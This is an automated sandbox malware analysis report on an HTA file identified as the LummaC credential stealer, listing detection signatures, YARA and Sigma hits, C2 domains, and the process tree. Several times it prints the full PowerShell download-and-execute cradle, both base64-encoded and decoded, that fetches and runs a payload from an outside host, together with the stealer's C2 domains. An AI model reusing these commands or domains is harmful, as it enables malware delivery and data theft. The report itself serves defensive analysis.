Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rii2.mp3.hta

Overview

General Information

Sample name:rii2.mp3.hta
Analysis ID:1589497
MD5:a181e4f186f156cbb238984f8a5bf4e6
SHA1:58c4adc3d4a848ae10bc29cf97dc5a70efa4c939
SHA256:007969cf64583d251ed63eda2c365f6cbfd768f37d05e699415d166021b3e294
Tags:htauser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Powershell Download and Execute IEX
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
LummaC encrypted strings found
Sample uses string decryption to hide its real strings
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 2084 cmdline: mshta.exe "C:\Users\user\Desktop\rii2.mp3.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 6536 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AaAAyAC4AZQByAHIAYQBuAHQAcgBlAGYAcgBhAGkAbgB1AG4AZABvAGMAawBlAGQALgBzAGgAbwBwAC8AcgBpAGkAMgAuAGYAaQBsAGUAJwApACkAYAAiACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA== MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3548 cmdline: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://h2.errantrefrainundocked.shop/rii2.file'))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 4600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • dllhost.exe (PID: 2792 cmdline: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
        • powershell.exe (PID: 2792 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["punishzement.biz", "truculengisau.biz", "spookycappy.biz", "marketlumpe.biz", "fraggielek.biz", "littlenotii.biz", "nuttyshopr.biz", "degreehourz.click", "grandiouseziu.biz"]}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    Process Memory Space: powershell.exe PID: 6536JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 3548JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        Process Memory Space: powershell.exe PID: 3548INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x78b076:$b2: ::FromBase64String(
        • 0x78affa:$s1: -join
        • 0xae3b2e:$s1: -join
        • 0xb0ade4:$s1: -join
        • 0xb0b760:$s1: -join
        • 0xb6b41a:$s1: -join
        • 0xb784ef:$s1: -join
        • 0xb7b8c1:$s1: -join
        • 0xb7bf73:$s1: -join
        • 0xb7da64:$s1: -join
        • 0xb7fc6a:$s1: -join
        • 0xb80491:$s1: -join
        • 0xb80d01:$s1: -join
        • 0xb8143c:$s1: -join
        • 0xb8146e:$s1: -join
        • 0xb814b6:$s1: -join
        • 0xb814d5:$s1: -join
        • 0xb81d25:$s1: -join
        • 0xb81ea1:$s1: -join
        • 0xb81f19:$s1: -join
        • 0xb81fac:$s1: -join
        decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
          SourceRuleDescriptionAuthorStrings
          amsi32_6536.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            amsi32_3548.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://h2.errantrefrainundocked.shop/rii2.file'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://h2.errantrefrainundocked.shop/rii2.file'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AaAAyAC4AZQByAHIAYQBuAHQAcgBlAGYAcgBhAGkAbgB1AG4AZABvAGMAawBlAGQALgBzAGgAbwBwAC8AcgBpAGkAMgAuAGYAaQBsAGUAJwApACkAYAAiACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6536, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://h2.errantrefrainundocked.shop/rii2.file'))" , ProcessId: 3548, ProcessName: powershell.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AaAAyAC4AZQByAHIAYQBuAHQAcgBlAGYAcgBhAGkAbgB1AG4AZABvAGMAawBlAGQALgBzAGgAbwBwAC8AcgBpAGkAMgAuAGYAaQBsAGUAJwApACkAYAAiACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AaAAyAC4AZQByAHIAYQBuAHQAcgBlAGYAcgBhAGkAbgB1AG4AZABvAGMAawBlAGQALgBzAGgAbwBwAC8AcgBpAGkAMgAuAGYAaQBsAGUAJwApACkAYAAiACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\rii2.mp3.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 2084, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AaAAyAC4AZQByAHIAYQBuAHQAcgBlAGYAcgBhAGkAbgB1AG4AZABvAGMAawBlAGQALgBzAGgAbwBwAC8AcgBpAGkAMgAuAGYAaQBsAGUAJwApACkAYAAiACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==, ProcessId: 6536, ProcessName: powershell.exe
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AaAAyAC4AZQByAHIAYQBuAHQAcgBlAGYAcgBhAGkAbgB1AG4AZABvAGMAawBlAGQALgBzAGgAbwBwAC8AcgBpAGkAMgAuAGYAaQBsAGUAJwApACkAYAAiACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AaAAyAC4AZQByAHIAYQBuAHQAcgBlAGYAcgBhAGkAbgB1AG4AZABvAGMAawBlAGQALgBzAGgAbwBwAC8AcgBpAGkAMgAuAGYAaQBsAGUAJwApACkAYAAiACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\rii2.mp3.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 2084, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AaAAyAC4AZQByAHIAYQBuAHQAcgBlAGYAcgBhAGkAbgB1AG4AZABvAGMAawBlAGQALgBzAGgAbwBwAC8AcgBpAGkAMgAuAGYAaQBsAGUAJwApACkAYAAiACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==, ProcessId: 6536, ProcessName: powershell.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://h2.errantrefrainundocked.shop/rii2.file'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://h2.errantrefrainundocked.shop/rii2.file'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AaAAyAC4AZQByAHIAYQBuAHQAcgBlAGYAcgBhAGkAbgB1AG4AZABvAGMAawBlAGQALgBzAGgAbwBwAC8AcgBpAGkAMgAuAGYAaQBsAGUAJwApACkAYAAiACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6536, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://h2.errantrefrainundocked.shop/rii2.file'))" , ProcessId: 3548, ProcessName: powershell.exe
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://h2.errantrefrainundocked.shop/rii2.file'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://h2.errantrefrainundocked.shop/rii2.file'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AaAAyAC4AZQByAHIAYQBuAHQAcgBlAGYAcgBhAGkAbgB1AG4AZABvAGMAawBlAGQALgBzAGgAbwBwAC8AcgBpAGkAMgAuAGYAaQBsAGUAJwApACkAYAAiACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6536, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://h2.errantrefrainundocked.shop/rii2.file'))" , ProcessId: 3548, ProcessName: powershell.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://h2.errantrefrainundocked.shop/rii2.file'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://h2.errantrefrainundocked.shop/rii2.file'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AaAAyAC4AZQByAHIAYQBuAHQAcgBlAGYAcgBhAGkAbgB1AG4AZABvAGMAawBlAGQALgBzAGgAbwBwAC8AcgBpAGkAMgAuAGYAaQBsAGUAJwApACkAYAAiACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6536, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://h2.errantrefrainundocked.shop/rii2.file'))" , ProcessId: 3548, ProcessName: powershell.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://h2.errantrefrainundocked.shop/rii2.file'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://h2.errantrefrainundocked.shop/rii2.file'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AaAAyAC4AZQByAHIAYQBuAHQAcgBlAGYAcgBhAGkAbgB1AG4AZABvAGMAawBlAGQALgBzAGgAbwBwAC8AcgBpAGkAMgAuAGYAaQBsAGUAJwApACkAYAAiACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==, ParentImage: 